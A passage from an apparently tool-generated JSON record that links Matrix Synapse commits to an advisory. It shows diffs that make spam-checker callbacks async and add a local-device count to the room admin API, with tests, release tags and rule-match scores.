userid: str) -> bool:", - " \"\"\"Checks if a given user may create a room", - "@@ -96,3 +104,6 @@ class SpamChecker:", - " for spam_checker in self.spam_checkers:", - "- if spam_checker.user_may_create_room(userid) is False:", - "+ if (", - "+ await maybe_awaitable(spam_checker.user_may_create_room(userid))", - "+ is False", - "+ ):", - " return False", - "@@ -101,3 +112,3 @@ class SpamChecker:", - "- def user_may_create_room_alias(self, userid: str, room_alias: str) -> bool:", - "+ async def user_may_create_room_alias(self, userid: str, room_alias: str) -> bool:", - " \"\"\"Checks if a given user may create a room alias", - "@@ -114,3 +125,8 @@ class SpamChecker:", - " for spam_checker in self.spam_checkers:", - "- if spam_checker.user_may_create_room_alias(userid, room_alias) is False:", - "+ if (", - "+ await maybe_awaitable(", - "+ spam_checker.user_may_create_room_alias(userid, room_alias)", - "+ )", - "+ is False", - "+ ):", - " return False", - "@@ -119,3 +135,3 @@ class SpamChecker:", - "- def user_may_publish_room(self, userid: str, room_id: str) -> bool:", - "+ async def user_may_publish_room(self, userid: str, room_id: str) -> bool:", - " \"\"\"Checks if a given user may publish a room to the directory", - "@@ -132,3 +148,8 @@ class SpamChecker:", - " for spam_checker in self.spam_checkers:", - "- if spam_checker.user_may_publish_room(userid, room_id) is False:", - "+ if (", - "+ await maybe_awaitable(", - "+ spam_checker.user_may_publish_room(userid, room_id)", - "+ )", - "+ is False", - "+ ):", - " return False", - "@@ -137,3 +158,3 @@ class SpamChecker:", - "- def check_username_for_spam(self, user_profile: Dict[str, str]) -> bool:", - "+ async def check_username_for_spam(self, user_profile: Dict[str, str]) -> bool:", - " \"\"\"Checks if a user ID or display name are considered \"spammy\" by this server.", - "@@ -159,3 +180,3 @@ class SpamChecker:", - " # cannot modify it.", - "- if checker(user_profile.copy()):", - "+ if await maybe_awaitable(checker(user_profile.copy())):", - " return True", - "@@ -164,3 +185,3 @@ class SpamChecker:", - "- def check_registration_for_spam(", - "+ async def check_registration_for_spam(", - " self,", - "@@ -187,3 +208,5 @@ class SpamChecker:", - " if checker:", - "- behaviour = checker(email_threepid, username, request_info)", - "+ behaviour = await maybe_awaitable(", - "+ checker(email_threepid, username, request_info)", - "+ )", - " assert isinstance(behaviour, RegistrationBehaviour)", - "diff --git a/synapse/federation/federation_base.py b/synapse/federation/federation_base.py", - "index 38aa47963..383737520 100644", - "--- a/synapse/federation/federation_base.py", - "+++ b/synapse/federation/federation_base.py", - "@@ -80,2 +80,3 @@ class FederationBase:", - "+ @defer.inlineCallbacks", - " def callback(_, pdu: EventBase):", - "@@ -107,3 +108,7 @@ class FederationBase:", - "- if self.spam_checker.check_event_for_spam(pdu):", - "+ result = yield defer.ensureDeferred(", - "+ self.spam_checker.check_event_for_spam(pdu)", - "+ )", - "+", - "+ if result:", - " logger.warning(", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index 62f98dabc..8deec4cd0 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -16,3 +16,2 @@", - " # limitations under the License.", - "-import inspect", - " import logging", - "@@ -61,2 +60,3 @@ from synapse.types import JsonDict, Requester, UserID", - " from synapse.util import stringutils as stringutils", - "+from synapse.util.async_helpers import maybe_awaitable", - " from synapse.util.msisdn import phone_number_to_msisdn", - "@@ -1641,4 +1641,4 @@ class PasswordProvider:", - " # until it completes.", - "- result = g(user_id=user_id, device_id=device_id, access_token=access_token,)", - "- if inspect.isawaitable(result):", - "- await result", - "+ await maybe_awaitable(", - "+ g(user_id=user_id, device_id=device_id, access_token=access_token,)", - "+ )", - "diff --git a/synapse/handlers/directory.py b/synapse/handlers/directory.py", - "index ad5683d25..abcf86352 100644", - "--- a/synapse/handlers/directory.py", - "+++ b/synapse/handlers/directory.py", - "@@ -135,3 +135,5 @@ class DirectoryHandler(BaseHandler):", - "- if not self.spam_checker.user_may_create_room_alias(user_id, room_alias):", - "+ if not await self.spam_checker.user_may_create_room_alias(", - "+ user_id, room_alias", - "+ ):", - " raise AuthError(403, \"This user is not permitted to create this alias\")", - "@@ -411,3 +413,3 @@ class DirectoryHandler(BaseHandler):", - "- if not self.spam_checker.user_may_publish_room(user_id, room_id):", - "+ if not await self.spam_checker.user_may_publish_room(user_id, room_id):", - " raise AuthError(", - "diff --git a/synapse/handlers/federation.py b/synapse/handlers/federation.py", - "index df82e60b3..fd8de8696 100644", - "--- a/synapse/handlers/federation.py", - "+++ b/synapse/handlers/federation.py", - "@@ -1595,3 +1595,3 @@ class FederationHandler(BaseHandler):", - "- if not self.spam_checker.user_may_invite(", - "+ if not await self.spam_checker.user_may_invite(", - " event.sender, event.state_key, event.room_id", - "diff --git a/synapse/handlers/message.py b/synapse/handlers/message.py", - "index 96843338a..2b8aa9443 100644", - "--- a/synapse/handlers/message.py", - "+++ b/synapse/handlers/message.py", - "@@ -746,3 +746,3 @@ class EventCreationHandler:", - "- spam_error = self.spam_checker.check_event_for_spam(event)", - "+ spam_error = await self.spam_checker.check_event_for_spam(event)", - " if spam_error:", - "diff --git a/synapse/handlers/receipts.py b/synapse/handlers/receipts.py", - "index 153cbae7b..e850e45e4 100644", - "--- a/synapse/handlers/receipts.py", - "+++ b/synapse/handlers/receipts.py", - "@@ -20,3 +20,2 @@ from synapse.handlers._base import BaseHandler", - " from synapse.types import JsonDict, ReadReceipt, get_domain_from_id", - "-from synapse.util.async_helpers import maybe_awaitable", - "@@ -100,6 +99,4 @@ class ReceiptsHandler(BaseHandler):", - " # Note that the min here shouldn't be relied upon to be accurate.", - "- await maybe_awaitable(", - "- self.hs.get_pusherpool().on_new_receipts(", - "- min_batch_id, max_batch_id, affected_room_ids", - "- )", - "+ await self.hs.get_pusherpool().on_new_receipts(", - "+ min_batch_id, max_batch_id, affected_room_ids", - " )", - "diff --git a/synapse/handlers/register.py b/synapse/handlers/register.py", - "index 0d85fd086..94b5610ac 100644", - "--- a/synapse/handlers/register.py", - "+++ b/synapse/handlers/register.py", - "@@ -189,3 +189,3 @@ class RegistrationHandler(BaseHandler):", - "- result = self.spam_checker.check_registration_for_spam(", - "+ result = await self.spam_checker.check_registration_for_spam(", - " threepid, localpart, user_agent_ips or [],", - "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", - "index 82fb72b38..758341894 100644", - "--- a/synapse/handlers/room.py", - "+++ b/synapse/handlers/room.py", - "@@ -360,3 +360,3 @@ class RoomCreationHandler(BaseHandler):", - "- if not self.spam_checker.user_may_create_room(user_id):", - "+ if not await self.spam_checker.user_may_create_room(user_id):", - " raise SynapseError(403, \"You are not permitted to create rooms\")", - "@@ -611,3 +611,3 @@ class RoomCreationHandler(BaseHandler):", - "- if not is_requester_admin and not self.spam_checker.user_may_create_room(", - "+ if not is_requester_admin and not await self.spam_checker.user_may_create_room(", - " user_id", - "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", - "index d85110a35..cb5a29bc7 100644", - "--- a/synapse/handlers/room_member.py", - "+++ b/synapse/handlers/room_member.py", - "@@ -410,3 +410,3 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", - "- if not self.spam_checker.user_may_invite(", - "+ if not await self.spam_checker.user_may_invite(", - " requester.user.to_string(), target.to_string(), room_id", - "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", - "index afbebfc20..f263a638f 100644", - "--- a/synapse/handlers/user_directory.py", - "+++ b/synapse/handlers/user_directory.py", - "@@ -83,7 +83,7 @@ class UserDirectoryHandler(StateDeltasHandler):", - " # Remove any spammy users from the results.", - "- results[\"results\"] = [", - "- user", - "- for user in results[\"results\"]", - "- if not self.spam_checker.check_username_for_spam(user)", - "- ]", - "+ non_spammy_users = []", - "+ for user in results[\"results\"]:", - "+ if not await self.spam_checker.check_username_for_spam(user):", - "+ non_spammy_users.append(user)", - "+ results[\"results\"] = non_spammy_users", - "diff --git a/synapse/metrics/background_process_metrics.py b/synapse/metrics/background_process_metrics.py", - "index 658f6ecd7..76b7decf2 100644", - "--- a/synapse/metrics/background_process_metrics.py", - "+++ b/synapse/metrics/background_process_metrics.py", - "@@ -15,3 +15,2 @@", - "-import inspect", - " import logging", - "@@ -27,2 +26,3 @@ from synapse.logging.context import LoggingContext, PreserveLoggingContext", - " from synapse.logging.opentracing import noop_context_manager, start_active_span", - "+from synapse.util.async_helpers import maybe_awaitable", - "@@ -208,8 +208,3 @@ def run_as_background_process(desc: str, func, *args, bg_start_span=True, **kwar", - " with ctx:", - "- result = func(*args, **kwargs)", - "-", - "- if inspect.isawaitable(result):", - "- result = await result", - "-", - "- return result", - "+ return await maybe_awaitable(func(*args, **kwargs))", - " except Exception:", - "diff --git a/synapse/rest/media/v1/storage_provider.py b/synapse/rest/media/v1/storage_provider.py", - "index 18c9ed48d..67f67efde 100644", - "--- a/synapse/rest/media/v1/storage_provider.py", - "+++ b/synapse/rest/media/v1/storage_provider.py", - "@@ -15,3 +15,2 @@", - "-import inspect", - " import logging", - "@@ -23,2 +22,3 @@ from synapse.config._base import Config", - " from synapse.logging.context import defer_to_thread, run_in_background", - "+from synapse.util.async_helpers import maybe_awaitable", - "@@ -93,5 +93,3 @@ class StorageProviderWrapper(StorageProvider):", - " # against improper implementations.", - "- result = self.backend.store_file(path, file_info)", - "- if inspect.isawaitable(result):", - "- return await result", - "+ return await maybe_awaitable(self.backend.store_file(path, file_info))", - " else:", - "@@ -100,5 +98,5 @@ class StorageProviderWrapper(StorageProvider):", - " try:", - "- result = self.backend.store_file(path, file_info)", - "- if inspect.isawaitable(result):", - "- return await result", - "+ return await maybe_awaitable(", - "+ self.backend.store_file(path, file_info)", - "+ )", - " except Exception:", - "@@ -112,5 +110,3 @@ class StorageProviderWrapper(StorageProvider):", - " # against improper implementations.", - "- result = self.backend.fetch(path, file_info)", - "- if inspect.isawaitable(result):", - "- return await result", - "+ return await maybe_awaitable(self.backend.fetch(path, file_info))", - "diff --git a/synapse/server.py b/synapse/server.py", - "index 043810ad3..a198b0eb4 100644", - "--- a/synapse/server.py", - "+++ b/synapse/server.py", - "@@ -620,3 +620,3 @@ class HomeServer(metaclass=abc.ABCMeta):", - " @cache_in_self", - "- def get_spam_checker(self):", - "+ def get_spam_checker(self) -> SpamChecker:", - " return SpamChecker(self)", - "diff --git a/synapse/util/async_helpers.py b/synapse/util/async_helpers.py", - "index 382f0cf3f..9a873c8e8 100644", - "--- a/synapse/util/async_helpers.py", - "+++ b/synapse/util/async_helpers.py", - "@@ -17,2 +17,3 @@", - " import collections", - "+import inspect", - " import logging", - "@@ -21,2 +22,3 @@ from typing import (", - " Any,", - "+ Awaitable,", - " Callable,", - "@@ -544,7 +546,7 @@ class DoneAwaitable:", - "-def maybe_awaitable(value):", - "+def maybe_awaitable(value: Union[Awaitable[R], R]) -> Awaitable[R]:", - " \"\"\"Convert a value to an awaitable if not already an awaitable.", - " \"\"\"", - "-", - "- if hasattr(value, \"__await__\"):", - "+ if inspect.isawaitable(value):", - "+ assert isinstance(value, Awaitable)", - " return value", - "diff --git a/synapse/util/distributor.py b/synapse/util/distributor.py", - "index f73e95393..a6ee9edae 100644", - "--- a/synapse/util/distributor.py", - "+++ b/synapse/util/distributor.py", - "@@ -14,3 +14,2 @@", - " # limitations under the License.", - "-import inspect", - " import logging", - "@@ -21,2 +20,3 @@ from synapse.logging.context import make_deferred_yieldable, run_in_background", - " from synapse.metrics.background_process_metrics import run_as_background_process", - "+from synapse.util.async_helpers import maybe_awaitable", - "@@ -107,6 +107,3 @@ class Signal:", - " try:", - "- result = observer(*args, **kwargs)", - "- if inspect.isawaitable(result):", - "- result = await result", - "- return result", - "+ return await maybe_awaitable(observer(*args, **kwargs))", - " except Exception as e:", - "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", - "index 98e5af207..647a17cb9 100644", - "--- a/tests/handlers/test_user_directory.py", - "+++ b/tests/handlers/test_user_directory.py", - "@@ -272,3 +272,3 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", - " class AllowAll:", - "- def check_username_for_spam(self, user_profile):", - "+ async def check_username_for_spam(self, user_profile):", - " # Allow all users.", - "@@ -285,3 +285,3 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", - " class BlockAll:", - "- def check_username_for_spam(self, user_profile):", - "+ async def check_username_for_spam(self, user_profile):", - " # All users are spammy." - ], - "changed_files": [ - "changelog.d/8890.feature", - "synapse/events/spamcheck.py", - "synapse/federation/federation_base.py", - "synapse/handlers/auth.py", - "synapse/handlers/directory.py", - "synapse/handlers/federation.py", - "synapse/handlers/message.py", - "synapse/handlers/receipts.py", - "synapse/handlers/register.py", - "synapse/handlers/room.py", - "synapse/handlers/room_member.py", - "synapse/handlers/user_directory.py", - "synapse/metrics/background_process_metrics.py", - "synapse/rest/media/v1/storage_provider.py", - "synapse/server.py", - "synapse/util/async_helpers.py", - "synapse/util/distributor.py", - "tests/handlers/test_user_directory.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8890": "Honour AS ratelimit settings for /login requests #8920 Add type hints to the crypto module #8999" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8890, 8890", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server, federation", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8890", - "relevance": 2 - } - ] - }, - { - "commit_id": "0a34cdfc6682c2654c745c4d7c2f5ffd1865dbc8", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607683367, - "hunks": 22, - "message": "Add number of local devices to Room Details Admin API (#8886)", - "diff": [ - "diff --git a/changelog.d/8886.feature b/changelog.d/8886.feature", - "new file mode 100644", - "index 000000000..9e446f28b", - "--- /dev/null", - "+++ b/changelog.d/8886.feature", - "@@ -0,0 +1 @@", - "+Add number of local devices to Room Details Admin API. Contributed by @dklimpel.", - "\\ No newline at end of file", - "diff --git a/synapse/rest/admin/rooms.py b/synapse/rest/admin/rooms.py", - "index 25f89e468..b902af802 100644", - "--- a/synapse/rest/admin/rooms.py", - "+++ b/synapse/rest/admin/rooms.py", - "@@ -16,3 +16,3 @@ import logging", - " from http import HTTPStatus", - "-from typing import List, Optional", - "+from typing import TYPE_CHECKING, List, Optional, Tuple", - "@@ -27,2 +27,3 @@ from synapse.http.servlet import (", - " )", - "+from synapse.http.site import SynapseRequest", - " from synapse.rest.admin._base import (", - "@@ -33,3 +34,6 @@ from synapse.rest.admin._base import (", - " from synapse.storage.databases.main.room import RoomSortOrder", - "-from synapse.types import RoomAlias, RoomID, UserID, create_requester", - "+from synapse.types import JsonDict, RoomAlias, RoomID, UserID, create_requester", - "+", - "+if TYPE_CHECKING:", - "+ from synapse.server import HomeServer", - "@@ -47,3 +51,3 @@ class ShutdownRoomRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -52,3 +56,5 @@ class ShutdownRoomRestServlet(RestServlet):", - "- async def on_POST(self, request, room_id):", - "+ async def on_POST(", - "+ self, request: SynapseRequest, room_id: str", - "+ ) -> Tuple[int, JsonDict]:", - " requester = await self.auth.get_user_by_req(request)", - "@@ -88,3 +94,3 @@ class DeleteRoomRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -94,3 +100,5 @@ class DeleteRoomRestServlet(RestServlet):", - "- async def on_POST(self, request, room_id):", - "+ async def on_POST(", - "+ self, request: SynapseRequest, room_id: str", - "+ ) -> Tuple[int, JsonDict]:", - " requester = await self.auth.get_user_by_req(request)", - "@@ -148,3 +156,3 @@ class ListRoomRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.store = hs.get_datastore()", - "@@ -153,3 +161,3 @@ class ListRoomRestServlet(RestServlet):", - "- async def on_GET(self, request):", - "+ async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:", - " requester = await self.auth.get_user_by_req(request)", - "@@ -238,3 +246,3 @@ class RoomRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -243,3 +251,5 @@ class RoomRestServlet(RestServlet):", - "- async def on_GET(self, request, room_id):", - "+ async def on_GET(", - "+ self, request: SynapseRequest, room_id: str", - "+ ) -> Tuple[int, JsonDict]:", - " await assert_requester_is_admin(self.auth, request)", - "@@ -250,3 +260,6 @@ class RoomRestServlet(RestServlet):", - "- return 200, ret", - "+ members = await self.store.get_users_in_room(room_id)", - "+ ret[\"joined_local_devices\"] = await self.store.count_devices_by_users(members)", - "+", - "+ return (200, ret)", - "@@ -260,3 +273,3 @@ class RoomMembersRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -265,3 +278,5 @@ class RoomMembersRestServlet(RestServlet):", - "- async def on_GET(self, request, room_id):", - "+ async def on_GET(", - "+ self, request: SynapseRequest, room_id: str", - "+ ) -> Tuple[int, JsonDict]:", - " await assert_requester_is_admin(self.auth, request)", - "@@ -282,3 +297,3 @@ class JoinRoomAliasServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -289,3 +304,5 @@ class JoinRoomAliasServlet(RestServlet):", - "- async def on_POST(self, request, room_identifier):", - "+ async def on_POST(", - "+ self, request: SynapseRequest, room_identifier: str", - "+ ) -> Tuple[int, JsonDict]:", - " requester = await self.auth.get_user_by_req(request)", - "@@ -316,3 +333,2 @@ class JoinRoomAliasServlet(RestServlet):", - " room_id, remote_room_hosts = await handler.lookup_room_alias(room_alias)", - "- room_id = room_id.to_string()", - " else:", - "diff --git a/synapse/storage/databases/main/devices.py b/synapse/storage/databases/main/devices.py", - "index dfb4f87b8..909767764 100644", - "--- a/synapse/storage/databases/main/devices.py", - "+++ b/synapse/storage/databases/main/devices.py", - "@@ -59,2 +59,34 @@ class DeviceWorkerStore(SQLBaseStore):", - "+ async def count_devices_by_users(self, user_ids: Optional[List[str]] = None) -> int:", - "+ \"\"\"Retrieve number of all devices of given users.", - "+ Only returns number of devices that are not marked as hidden.", - "+", - "+ Args:", - "+ user_ids: The IDs of the users which owns devices", - "+ Returns:", - "+ Number of devices of this users.", - "+ \"\"\"", - "+", - "+ def count_devices_by_users_txn(txn, user_ids):", - "+ sql = \"\"\"", - "+ SELECT count(*)", - "+ FROM devices", - "+ WHERE", - "+ hidden = '0' AND", - "+ \"\"\"", - "+", - "+ clause, args = make_in_list_sql_clause(", - "+ txn.database_engine, \"user_id\", user_ids", - "+ )", - "+", - "+ txn.execute(sql + clause, args)", - "+ return txn.fetchone()[0]", - "+", - "+ if not user_ids:", - "+ return 0", - "+", - "+ return await self.db_pool.runInteraction(", - "+ \"count_devices_by_users\", count_devices_by_users_txn, user_ids", - "+ )", - "+", - " async def get_device(self, user_id: str, device_id: str) -> Dict[str, Any]:", - "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", - "index 46933a049..9c100050d 100644", - "--- a/tests/rest/admin/test_room.py", - "+++ b/tests/rest/admin/test_room.py", - "@@ -1086,2 +1086,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " self.assertIn(\"joined_local_members\", channel.json_body)", - "+ self.assertIn(\"joined_local_devices\", channel.json_body)", - " self.assertIn(\"version\", channel.json_body)", - "@@ -1098,2 +1099,35 @@ class RoomTestCase(unittest.HomeserverTestCase):", - "+ def test_single_room_devices(self):", - "+ \"\"\"Test that `joined_local_devices` can be requested correctly\"\"\"", - "+ room_id_1 = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)", - "+", - "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "+ request, channel = self.make_request(", - "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "+ )", - "+ self.assertEqual(200, channel.code, msg=channel.json_body)", - "+ self.assertEqual(1, channel.json_body[\"joined_local_devices\"])", - "+", - "+ # Have another user join the room", - "+ user_1 = self.register_user(\"foo\", \"pass\")", - "+ user_tok_1 = self.login(\"foo\", \"pass\")", - "+ self.helper.join(room_id_1, user_1, tok=user_tok_1)", - "+", - "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "+ request, channel = self.make_request(", - "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "+ )", - "+ self.assertEqual(200, channel.code, msg=channel.json_body)", - "+ self.assertEqual(2, channel.json_body[\"joined_local_devices\"])", - "+", - "+ # leave room", - "+ self.helper.leave(room_id_1, self.admin_user, tok=self.admin_user_tok)", - "+ self.helper.leave(room_id_1, user_1, tok=user_tok_1)", - "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "+ request, channel = self.make_request(", - "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "+ )", - "+ self.assertEqual(200, channel.code, msg=channel.json_body)", - "+ self.assertEqual(0, channel.json_body[\"joined_local_devices\"])", - "+", - " def test_room_members(self):", - "diff --git a/tests/storage/test_devices.py b/tests/storage/test_devices.py", - "index ecb00f4e0..dabc1c5f0 100644", - "--- a/tests/storage/test_devices.py", - "+++ b/tests/storage/test_devices.py", - "@@ -81,2 +81,28 @@ class DeviceStoreTestCase(tests.unittest.TestCase):", - "+ @defer.inlineCallbacks", - "+ def test_count_devices_by_users(self):", - "+ yield defer.ensureDeferred(", - "+ self.store.store_device(\"user_id\", \"device1\", \"display_name 1\")", - "+ )", - "+ yield defer.ensureDeferred(", - "+ self.store.store_device(\"user_id\", \"device2\", \"display_name 2\")", - "+ )", - "+ yield defer.ensureDeferred(", - "+ self.store.store_device(\"user_id2\", \"device3\", \"display_name 3\")", - "+ )", - "+", - "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users())", - "+ self.assertEqual(0, res)", - "+", - "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users([\"unknown\"]))", - "+ self.assertEqual(0, res)", - "+", - "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users([\"user_id\"]))", - "+ self.assertEqual(2, res)", - "+", - "+ res = yield defer.ensureDeferred(", - "+ self.store.count_devices_by_users([\"user_id\", \"user_id2\"])", - "+ )", - "+ self.assertEqual(3, res)", - "+", - " @defer.inlineCallbacks" - ], - "changed_files": [ - "changelog.d/8886.feature", - "synapse/rest/admin/rooms.py", - "synapse/storage/databases/main/devices.py", - "tests/rest/admin/test_room.py", - "tests/storage/test_devices.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8886": "Add number of local devices to Room Details Admin API Awesome-Technologies/synapse-admin#92 ValueError: Attempted to iterate a RoomID #9505" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - 